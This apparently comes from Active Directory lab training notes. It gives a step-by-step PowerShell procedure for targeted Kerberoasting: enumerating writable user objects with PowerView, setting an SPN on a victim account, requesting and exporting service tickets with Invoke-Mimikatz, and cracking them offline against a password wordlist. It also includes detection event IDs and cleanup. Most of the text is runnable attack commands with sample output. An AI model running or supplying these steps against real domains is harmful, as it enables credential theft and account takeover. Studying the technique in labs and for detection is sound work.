With sufficient rights over a target user object (GenericAll, GenericWrite, or write access to its servicePrincipalName attribute), that user's SPN can be set to an arbitrary value; the only constraint is that the SPN must be unique within the domain.
Any authenticated domain user can then request a TGS for that SPN — no special privilege is needed. Because the service ticket is encrypted with a key derived from the target user's password, it can be "Kerberoasted", i.e. cracked offline. This is only useful if the target's password is weak enough to crack; the SPN write is also an audited change to the object, so remove it afterwards.
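# Targeted Kerberoasting: use write access over another user's object to give it an
# SPN, request a TGS for that SPN, and crack the service ticket offline.
# NOTE: every step below touches the domain (LDAP writes, TGS requests). Read the
# detection and cleanup notes at the end before running this anywhere that matters.

# 1. Find which groups the current user belongs to (here: the "RDP Users" group).
Import-Module powerview.ps1
Get-NetUser -UserName student529
# Sample output:
#   givenname : student529
#   memberof  : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local

# List all groups in the domain.
Get-NetGroup

# 2. Enumerate ACEs where our group is the trustee, using PowerView (dev), to find
# user objects we can write to.
# The group is printed as "RDP Users" in the memberof line above but the original
# notes matched on "RDPUsers"; the pattern below accepts both spellings.
# The rights that make a user's SPN writable are GenericAll, GenericWrite, or
# WriteProperty on servicePrincipalName — check ActiveDirectoryRights in the output.
Import-Module powerview_dev.ps1
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDP ?Users"}

# 3. Check whether the target user already has an SPN. If it does, Kerberoast it
# as-is; there is no need to modify the object at all.
Import-Module powerview_dev.ps1
Get-DomainUser -Identity support10user | select serviceprincipalname

# 4. If the user has no SPN, set one. The value is arbitrary but must be unique in
# the domain (a duplicate SPN breaks ticket issuance for both accounts).
# This is an LDAP write to the user object: it is a directory change that is
# typically logged on the DC (Event ID 5136 when directory service change auditing
# is enabled) and it leaves a visible artifact until removed — see cleanup below.
Import-Module powerview_dev.ps1
Set-DomainObject -Identity support10user -Set @{serviceprincipalname='ops/whatever1'}

# 5. Request a TGS for the new SPN. Any authenticated domain user may request a
# service ticket for any SPN; no special privilege is needed. The ticket's encrypted
# part is protected with the target user's password-derived key, which is what the
# offline crack attacks. The TGS request itself is typically logged as Event ID 4769
# on the DC (an RC4 ticket, encryption type 0x17, stands out in AES-only environments).
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"

# Alternative: Request-SPNTicket from PowerView (dev) requests the ticket and prints
# it in a John/Hashcat-compatible hash format directly, skipping the export step.
# (It is a PowerView cmdlet; Invoke-Mimikatz is not needed for this.)
Import-Module powerview_dev.ps1
Request-SPNTicket ops/whatever1

# 6. Confirm the service ticket is now in the current logon session's ticket cache.
klist

# 7. Export all cached tickets as .kirbi files. This is the step that needs
# Invoke-Mimikatz; note it dumps every ticket in the session, not just the TGS.
Import-Module invoke-mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::list /export"'

# 8. Crack the exported TGS offline against a wordlist. The .kirbi name has the form
# <id>-<flags>-<requesting user>@<spn with '/' as '~'>-<realm>.kirbi, so the
# user part is the account that requested the ticket (student529 in this session),
# not the target user. The original notes showed "student1" here — adjust the
# filename to whatever kerberos::list /export actually wrote.
python.exe .\tgsrepcrack.py .\10k-passwords.txt '.\2-40a10000-student1@ops~whatever1-dollarcorp.moneycorp.LOCAL.kirbi'

# 9. Cleanup: remove the SPN we added so the target object is left as we found it
# (only do this if step 3 showed the user had no SPN to begin with).
Set-DomainObject -Identity support10user -Clear serviceprincipalname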